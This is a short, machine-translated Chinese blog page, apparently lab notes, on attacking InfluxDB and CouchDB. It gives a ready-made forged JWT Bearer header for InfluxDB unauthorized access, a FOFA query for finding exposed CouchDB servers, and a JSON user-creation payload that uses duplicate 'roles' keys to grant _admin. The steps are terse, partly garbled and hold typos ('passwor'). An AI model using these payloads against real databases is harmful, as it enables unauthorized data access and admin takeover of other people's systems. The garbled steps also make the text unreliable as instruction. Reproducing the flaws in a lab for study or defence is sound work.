当前位置:网站首页>Influxdb unauthorized access & CouchDB permission bypass
Influxdb unauthorized access & CouchDB permission bypass
2022-07-24 07:26:00 【Boring knowledge】
Influxdb- Unauthorized access
Default port :8086 8088
With the help of https://jwt.io/ To generate jwt token:
Grab a bag when logging in
Then add a part to the data
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJpYXQiOjE2NzEyNTIxMjN9.Y9i99OpSWOInZqmBpQAvr2ymmsWG2dZZDYkz9RzrCk0
At this time, you can check the data
CouchDB- Authority bypass
FOFA How can I try
The corresponding version should not be higher than 1.7.0
“CouchDB” && port=“5984”
Unauthorized
Add... After the address
_utils/#
There is also another one that needs to catch packets
Two things need to be added to the data package
/_users/org.couchdb.user:vulhub
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"passwor": "123456"
}
When we send packets , You can see a OK Time
You may have successfully added the user
You can try to login
边栏推荐
- JMeter notes 2 | JMeter principle and test plan elements
- Vulnhub DC1
- 定制 or 通用,中国 SaaS 未来发展趋势是什么?
- QoS quality of service three DiffServ Model message marking and PHB
- 从CIA看常见网络攻击(爆破,PE,流量攻击)
- Chapter007 FPGA learning IIC bus EEPROM reading
- Part II - C language improvement_ 1. Overview of C language
- Filter 过滤器
- Part I - Fundamentals of C language_ 11. Comprehensive project - greedy snake
- 17. What is the situation of using ArrayList or LinkedList?
猜你喜欢
php 转义字符串
Influxdb未授权访问&CouchDB权限绕过
Oauth2==SSO三种协议。Oauth2四种模式
sqli-labs简单安装
记账APP:小哈记账2——注册页面的制作
17. What is the situation of using ArrayList or LinkedList?
Vulnhub DC1
二维平面多段线Y轴最短距离
Deep learning two or three things - review those classical convolutional neural networks
Jay Chou's live broadcast was watched by more than 6.54 million people, with a total interaction volume of 450million, helping Kwai break the record again
随机推荐
Vulnhub DC1
全国职业院校技能大赛网络安全B模块 缓冲区溢出漏洞
numpy.concatenate
Advanced part of Nacos
From the perspective of CIA, common network attacks (blasting, PE, traffic attacks)
InjectFix原理学习(实现修复加法的热更)
Part II - C language improvement_ 3. Pointer reinforcement
我的创作纪念日
Riotboard development board series notes (IX) -- buildreoot porting matchbox
php 转义字符串
Unity中使用深度和法线纹理
JS_实现多行文本根据换行分隔成数组
【Tips】创建版本控制项目的简单方法
QoS服务质量四QoS边界行为之流量监管
DOM operation of JS -- style operation
Network security B module windows operating system penetration test of national vocational college skills competition
Chapter007 FPGA learning IIC bus EEPROM reading
In the era of e-commerce, what should enterprises do in the transformation of social e-commerce?
Single Gmv has increased 100 times. What is the "general rule" behind the rise of popular brands?
numpy.concatenate